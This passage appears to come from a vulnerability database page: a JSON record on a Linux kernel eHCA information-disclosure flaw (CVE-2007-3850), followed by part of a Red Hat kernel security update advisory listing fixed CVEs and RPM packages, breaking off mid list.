SA25895: http://secunia.com/advisories/25895/

SA26322: http://secunia.com/advisories/26322/

SA26935: http://secunia.com/advisories/26935/


About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200710-0169",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86-64)"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "linux",
        "version": "version"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 (server)"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.0 (client)"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3 (x86)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "enterprise linux desktop client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "26161"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000900"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3850"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200710-445"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "2.6.21",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:apple:powerpc:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-3850"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "This issue was disclosed in the referenced Red Hat advisory.",
    "sources": [
      {
        "db": "BID",
        "id": "26161"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200710-445"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2007-3850",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 1.9,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.4,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 1.9,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2007-3850",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 1.9,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.4,
            "id": "VHN-27212",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.1,
            "vectorString": "AV:L/AC:M/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2007-3850",
            "trust": 1.8,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200710-445",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULHUB",
            "id": "VHN-27212",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-27212"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000900"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3850"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200710-445"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The eHCA driver in Linux kernel 2.6 before 2.6.22, when running on PowerPC, does not properly map userspace resources, which allows local users to read portions of physical address space. The Linux kernel is prone to an information-disclosure vulnerability. \nSuccessful exploits will allow attackers to obtain a portion of the physical address space. Information harvested may aid in further attacks. \n\n----------------------------------------------------------------------\n\nTry a new way to discover vulnerabilities that ALREADY EXIST in your\nIT infrastructure. \n\nThe Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT\nvulnerabilities in more than 4,700 different Windows applications. \n\nRequest your account, the Secunia Network Software Inspector (NSI):\nhttp://secunia.com/network_software_inspector/\n\n----------------------------------------------------------------------\n\nTITLE:\nRed Hat update for kernel\n\nSECUNIA ADVISORY ID:\nSA27322\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/27322/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nSecurity Bypass, DoS\n\nWHERE:\n\u003eFrom remote\n\nOPERATING SYSTEM:\nRed Hat Enterprise Linux (v. 5 server)\nhttp://secunia.com/product/13652/\nRed Hat Enterprise Linux Desktop (v. 5 client)\nhttp://secunia.com/product/13653/\n\nDESCRIPTION:\nRed Hat has issued an update for the kernel. This fixes some\nvulnerabilities, which can be exploited by malicious, local users to\nbypass certain security restrictions and to cause a DoS (Denial of\nService), and by malicious people to cause a DoS. \n\nFor more information:\nSA25594\nSA25895\nSA26322\nSA26935\n\nSOLUTION:\nUpdated packages are available via Red Hat Network. \nhttp://rhn.redhat.com\n\nORIGINAL ADVISORY:\nhttps://rhn.redhat.com/errata/RHSA-2007-0940.html\n\nOTHER REFERENCES:\nSA25594:\nhttp://secunia.com/advisories/25594/\n\nSA25895:\nhttp://secunia.com/advisories/25895/\n\nSA26322:\nhttp://secunia.com/advisories/26322/\n\nSA26935:\nhttp://secunia.com/advisories/26935/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-3850"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000900"
      },
      {
        "db": "BID",
        "id": "26161"
      },
      {
        "db": "VULHUB",
        "id": "VHN-27212"
      },
      {
        "db": "PACKETSTORM",
        "id": "60246"
      }
    ],
    "trust": 2.07
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2007-3850",
        "trust": 2.8
      },
      {
        "db": "BID",
        "id": "26161",
        "trust": 2.8
      },
      {
        "db": "SECUNIA",
        "id": "27322",
        "trust": 1.8
      },
      {
        "db": "OSVDB",
        "id": "45488",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000900",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200710-445",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-27212",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "60246",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-27212"
      },
      {
        "db": "BID",
        "id": "26161"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000900"
      },
      {
        "db": "PACKETSTORM",
        "id": "60246"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3850"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200710-445"
      }
    ]
  },
  "id": "VAR-200710-0169",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-27212"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:27:11.944000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "kernel-2.6.18-8.12AX",
        "trust": 0.8,
        "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=58"
      },
      {
        "title": "ChangeLog-2.6.22",
        "trust": 0.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.22"
      },
      {
        "title": "RHSA-2007:0940",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2007-0940.html"
      },
      {
        "title": "RHSA-2007:0940",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2007-0940j.html"
      },
      {
        "title": "Linux kernel Repair measures for information disclosure vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=236301"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000900"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200710-445"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.9
      },
      {
        "problemtype": "CWE-DesignError",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-27212"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000900"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3850"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "http://www.securityfocus.com/bid/26161"
      },
      {
        "trust": 2.1,
        "url": "http://rhn.redhat.com/errata/rhsa-2007-0940.html"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/27322"
      },
      {
        "trust": 1.7,
        "url": "http://osvdb.org/45488"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=721151d004dcf01a71b12bb6b893f9160284cf6e"
      },
      {
        "trust": 1.7,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a10793"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3850"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2007-3850"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=308811"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/26322/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/13652/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/26935/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/25895/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/network_software_inspector/"
      },
      {
        "trust": 0.1,
        "url": "http://rhn.redhat.com"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/25594/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/27322/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/product/13653/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/about_secunia_advisories/"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-27212"
      },
      {
        "db": "BID",
        "id": "26161"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000900"
      },
      {
        "db": "PACKETSTORM",
        "id": "60246"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3850"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200710-445"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-27212"
      },
      {
        "db": "BID",
        "id": "26161"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000900"
      },
      {
        "db": "PACKETSTORM",
        "id": "60246"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3850"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200710-445"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2007-10-23T00:00:00",
        "db": "VULHUB",
        "id": "VHN-27212"
      },
      {
        "date": "2007-10-22T00:00:00",
        "db": "BID",
        "id": "26161"
      },
      {
        "date": "2007-11-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-000900"
      },
      {
        "date": "2007-10-22T18:39:08",
        "db": "PACKETSTORM",
        "id": "60246"
      },
      {
        "date": "2007-10-23T10:46:00",
        "db": "NVD",
        "id": "CVE-2007-3850"
      },
      {
        "date": "2007-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200710-445"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-02-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-27212"
      },
      {
        "date": "2007-10-24T19:36:00",
        "db": "BID",
        "id": "26161"
      },
      {
        "date": "2007-12-19T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-000900"
      },
      {
        "date": "2023-02-13T02:18:12.537000",
        "db": "NVD",
        "id": "CVE-2007-3850"
      },
      {
        "date": "2023-05-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200710-445"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "26161"
      },
      {
        "db": "PACKETSTORM",
        "id": "60246"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200710-445"
      }
    ],
    "trust": 1.0
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "PowerPC Work on  Linux Kernel of  eHCA Information disclosure vulnerability in drivers",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000900"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "information disclosure",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200710-445"
      }
    ],
    "trust": 0.6
  }
}

var-201801-1708
Vulnerability from variot

The tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c in the Linux kernel before 4.11, and 4.9.x before 4.9.36, allows remote attackers to cause a denial of service (use-after-free and memory corruption) or possibly have unspecified other impact by leveraging the presence of xt_TCPMSS in an iptables action. Linux Kernel Contains a vulnerability in the use of freed memory.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Linux Kernel is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition. Linux kernel versions prior to 4.11, and 4.9.x prior to 4.9.36 are vulnerable. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 6.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64

Security Fix(es):

  • hw: cpu: speculative execution permission faults handling (CVE-2017-5754)

  • Kernel: error in exception handling leads to DoS (CVE-2018-8897)

  • kernel: nfsd: Incorrect handling of long RPC replies (CVE-2017-7645)

  • kernel: Use-after-free vulnerability in DCCP socket (CVE-2017-8824)

  • kernel: v4l2: disabled memory access protection mechanism allowing privilege escalation (CVE-2017-13166)

  • kernel: netfilter: use-after-free in tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c (CVE-2017-18017)

  • kernel: Stack information leak in the EFS element (CVE-2017-1000410)

For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.

Red Hat would like to thank Google Project Zero for reporting CVE-2017-5754; Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for reporting CVE-2018-8897; Mohamed Ghannam for reporting CVE-2017-8824; and Armis Labs for reporting CVE-2017-1000410.

Bug Fix(es):

These updated kernel packages include also numerous bug fixes. Space precludes documenting all of these bug fixes in this advisory. See the bug fix descriptions in the related Knowledge Article: https://access.redhat.com/articles/3431591

  1. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1443615 - CVE-2017-7645 kernel: nfsd: Incorrect handling of long RPC replies 1519160 - CVE-2017-1000410 kernel: Stack information leak in the EFS element 1519591 - CVE-2017-8824 kernel: Use-after-free vulnerability in DCCP socket 1519781 - CVE-2017-5754 hw: cpu: speculative execution permission faults handling 1531135 - CVE-2017-18017 kernel: netfilter: use-after-free in tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c 1548412 - CVE-2017-13166 kernel: v4l2: disabled memory access protection mechanism allowing privilege escalation 1567074 - CVE-2018-8897 Kernel: error in exception handling leads to DoS

  1. Package List:

Red Hat Enterprise Linux Desktop (v. 6):

Source: kernel-2.6.32-696.28.1.el6.src.rpm

i386: kernel-2.6.32-696.28.1.el6.i686.rpm kernel-debug-2.6.32-696.28.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm kernel-devel-2.6.32-696.28.1.el6.i686.rpm kernel-headers-2.6.32-696.28.1.el6.i686.rpm perf-2.6.32-696.28.1.el6.i686.rpm perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm

noarch: kernel-abi-whitelists-2.6.32-696.28.1.el6.noarch.rpm kernel-doc-2.6.32-696.28.1.el6.noarch.rpm kernel-firmware-2.6.32-696.28.1.el6.noarch.rpm

x86_64: kernel-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm kernel-debug-devel-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm kernel-devel-2.6.32-696.28.1.el6.x86_64.rpm kernel-headers-2.6.32-696.28.1.el6.x86_64.rpm perf-2.6.32-696.28.1.el6.x86_64.rpm perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

i386: kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm python-perf-2.6.32-696.28.1.el6.i686.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm

x86_64: kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm python-perf-2.6.32-696.28.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source: kernel-2.6.32-696.28.1.el6.src.rpm

noarch: kernel-abi-whitelists-2.6.32-696.28.1.el6.noarch.rpm kernel-doc-2.6.32-696.28.1.el6.noarch.rpm kernel-firmware-2.6.32-696.28.1.el6.noarch.rpm

x86_64: kernel-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm kernel-debug-devel-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm kernel-devel-2.6.32-696.28.1.el6.x86_64.rpm kernel-headers-2.6.32-696.28.1.el6.x86_64.rpm perf-2.6.32-696.28.1.el6.x86_64.rpm perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

x86_64: kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm python-perf-2.6.32-696.28.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

